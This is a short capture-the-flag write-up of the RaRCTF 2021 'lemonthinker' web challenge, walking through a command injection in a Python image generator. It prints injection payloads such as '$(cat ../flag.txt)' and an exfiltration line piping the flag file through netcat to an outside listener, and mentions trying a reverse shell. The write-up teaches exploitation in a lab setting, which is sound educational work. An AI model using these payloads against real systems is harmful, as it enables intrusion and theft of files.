Published
- 3 min read
lemon thinker rarctf 2021 Web Challenges Writeup

lemon thinker rarctf 2021 Web Challenges Writeup
Hello all , we hope all of you is well
This writeup is from Abdoghazy , Mohamed Tarek
Today we will explain how we could solve lemonthinker web challenge from rarctf .
As we See This is an input and “Generate Your lemonthinker”
after trying it we got this photo
note that the source code is attached so let’s see what inisde it
As we see at line 24 it takes the name from me and passes it to the command that running another script
and there is no filtertion for the input that passes into the command so for sure we thought it’s a command injection
note that the os is linux
the command : python3 generate.py {filename} \"{text}\"
the user input will be insted of {text} so we will inject there
as always we tried these payloads : ";id , ||whoami , &&id"
but unforently it’s not working with us then we see that the input is passes into "" two double qoutes
so our payloads didn’t working and as we learn at bash we could execute commands from this ”$(ls)”
and when we tried it we got the response from the server Alhamdullah
note : we tried to get reverse shell but no waaay :(
so after this let’s read the flag !!
note that we got that the flag is in ../flag.txt from the source
so i tried : $(cat ../flag.txt) and it returned this photo :


$(cat ../flag.txt | cut -c 0-3)
Then The Second Way and i think it’s an amazing way xD after we solved it by the first way i had to travel to my Collage and when i on my way i got this idea ;) i know when two hosts just connected togheter in same port by nc they could contact like a Chat :D so what if we tried to open listner on port 4444 and tried to sent the flag on it by this command
$(rev ../flag.txt | nc ip port )
and we got the full flag by one Command Alhamdullah :D 3>
